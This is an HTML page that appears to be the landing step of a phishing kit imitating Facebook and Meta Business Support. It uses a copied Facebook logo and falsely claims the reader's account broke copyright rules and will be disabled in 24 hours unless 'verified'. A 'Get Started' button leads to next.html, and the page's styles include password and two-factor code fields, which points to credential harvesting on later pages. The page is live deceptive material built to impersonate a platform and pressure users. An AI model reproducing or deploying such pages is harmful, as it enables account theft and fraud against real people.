<!DOCTYPE html>
<html lang="en" class="hydrated">
  <head>
    <meta charset="UTF-8" />
    <meta name="referrer" content="no-referrer" />
    <link rel="icon" type="image/png" href="dhZp13AM.ico" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta property="og:site_name" content="Your Account Has Been Locked" />
    <meta property="og:image" content="img/L0cKFB.png" />
    <meta
      name="description"
      content="You can learn more about why we suspend accounts by visiting the Community Standards."
    />
    <title>Facebook</title>
    <link rel="stylesheet" href="index-d246d0d3.css" />
    <link type="text/css" rel="stylesheet" href="bootstrap.css" />
    <link type="text/css" rel="stylesheet" href="loader.css" />
    <link rel="stylesheet" href="all.min.css" />
    <link rel="stylesheet" href="font-awesome.min.css" />
    <link rel="stylesheet" href="all.css" />
    <link rel="stylesheet" href="bootstrap.min.css" crossorigin="anonymous" />
  </head>
  <body style="background: #fff">
    <style>
      body {
        background-color: #f0f2f5;
        font-family: Helvetica;
        -webkit-font-smoothing: antialiased;
      }

      .header {
        background-color: white;
        padding-top: 8px;
        padding-bottom: 8px;
        box-shadow: 1px 1px 8px 1px rgb(0 0 0 / 10%);
      }

      .main .card {
        margin-top: 60px;
        background-color: white;
        padding-top: 16px;
        padding-bottom: 0px;
        padding-left: 16px;
        padding-right: 16px;
        border: none;
        box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
        margin-bottom: 30px;
      }

      .main .open {
        color: white;
        padding: 4px 10px;
        border-radius: 5px;
      }

      .ikonauser {
        background-color: #c4c9cd;
        border-radius: 50%;
        font-size: 15px;
        color: white;
        padding: 10px;
      }

      label {
        color: #90949c;
        font-weight: bold;
        font-size: 12px;
      }

      input[type="text"],
      textarea,
      input[type="password"] {
        color: #495057;
        background-color: #fff;
        background-clip: padding-box;
        border-radius: 0px !important;
        border: 1px solid #ced4da;
      }

      .butoni {
        background-color: #4267b2;
        border: 1px solid #4267b2;
        width: 100px;
        height: 34px;
        color: white;
        margin-top: 15px;
        font-size: 13px;
        border-radius: 2px;
        text-transform: none;
        font-weight: bold;
        float: right;
      }

      .butoni:hover {
        background-color: #444444;
      }

      #main {
      }

      #fac {
        margin-top: 50px;
        display: none;
        margin-bottom: 60px;
      }

      .twh3 {
        border-bottom: 1px solid rgba(0, 0, 0, 0.101);
        background-color: #f5f6f7;
        font-size: 16px;
        color: #4b4f56;
        padding: 12px;
        font-weight: 700;
        border-top-left-radius: 8px;
        border-top-right-radius: 8px;
      }

      #fac .card {
        border-top-left-radius: 8px;
        border-top-right-radius: 8px;
      }

      #fac .bodyyy p {
        font-size: 13px;
      }

      #fac .bodyyy {
        padding: 10px 20px !important;
        border-bottom: 1px solid rgba(0, 0, 0, 0.101);
      }

      #fac .footerii {
        padding: 10px 20px !important;
        background-color: #f5f6f7;
        height: 55px;
      }

      .nolink {
        color: black !important;
        font-size: 14px !important;
      }

      #twof .modal-body {
        font-size: 14px;
      }

      .paddingleftt {
        padding-left: 12px;
      }

      @media only screen and (max-width: 600px) {
      }

      @media (max-width: 400px) {
        .linkupertwo {
          font-size: 12px !important;
          margin-top: 8px !important;
        }
      }

      .ourmessagiii {
        font-family: "Arial";
      }

      #sendcodeagain {
        display: none;
        font-size: 14px;
        padding-left: 0px;
        color: #385898;
      }

      #sendcodeagain:hover {
        color: #385898 !important;
      }

      .fotoh {
        width: 94%;
        margin: 0 auto;
      }

      /* Chrome, Safari, Edge, Opera */
      input::-webkit-outer-spin-button,
      input::-webkit-inner-spin-button {
        -webkit-appearance: none;
        margin: 0;
      }

      /* Firefox */
      input[type="number"] {
        -moz-appearance: textfield;
      }
    </style>

    <div class="welcome">
      <header
        class="header-section"
        style="background: #fff; border-bottom: 0.5px solid rgba(0, 0, 0, 0.15)"
      >
        <div class="header-container">
          <div class="w-25">
            <div class="logo-area">
              <svg
                viewBox="0 0 36 36"
                class="k0f0a27 _a4pc"
                fill="currentColor"
                height="40"
                width="40"
              >
                <path
                  d="M20.181 35.87C29.094 34.791 36 27.202 36 18c0-9.941-8.059-18-18-18S0 8.059 0 18c0 8.442 5.811 15.526 13.652 17.471L14 34h5.5l.681 1.87Z"
                ></path>
                <path
                  class="q61vvz9"
                  d="M13.651 35.471v-11.97H9.936V18h3.715v-2.37c0-6.127 2.772-8.964 8.784-8.964 1.138 0 3.103.223 3.91.446v4.983c-.425-.043-1.167-.065-2.081-.065-2.952 0-4.09 1.116-4.09 4.025V18h5.883l-1.008 5.5h-4.867v12.37a18.183 18.183 0 0 1-6.53-.399Z"
                ></path>
              </svg>
            </div>
          </div>
        </div>
      </header>
      <div class="body mb-5">
        <div class="form-wrapper">
          <h3>Account will be deactivated</h3>
          <div class="blok1">
            Your account or the page you use has violated copyright. We will
            immediately limit your account or permanently disable it for
            non-compliance with our terms of service.
          </div>
          <div class="blok1">
            If you think we've accidentally suspended your account, you have
            <b>24 hours</b> to verify your account. If you miss this security
            notification, your account will be permanently disabled.
          </div>
          <div class="select-issue">
            <div class="form-check mb-3">
              <table
                border="0"
                cellspacing="0"
                cellpadding="0"
                style="border-collapse: collapse"
              >
                <tbody>
                  <tr>
                    <td valign="top" style="">
                      <a
                        href="https://www.facebook.com/metasupportpros"
                        style="color: #1b74e4; text-decoration: none"
                      >
                        <img
                          width="64"
                          src="TbXLmqW3Z.png"
                          style="
                            border: solid 1px rgba(0, 0, 0, 0.15);
                            border-radius: 50%;
                          "
                        />
                      </a>
                    </td>
                    <td>
                      <div class="Tex5">Meta Business Support</div>
                    </td>
                  </tr>
                </tbody>
              </table>
            </div>
            <div class="Tex3">
              We will walk you through several steps to cancel a deactivated
              account.
            </div>
            <div class="justify-content-end w-full">
              <button
                class="btn btn-lg btn-primary"
                style="
                  background: rgb(26, 115, 232);
                  width: 100%;
                  font-size: 16px;
                  line-height: 0px;
                  border-radius: 5px;
                  cursor: pointer;
                "
                onclick="window.location.href='next.html'"
              >
                Get Started
              </button>
            </div>
          </div>
        </div>
        <div class="mEtcORP">Meta © 2024</div>
      </div>
    </div>
  </body>
</html>
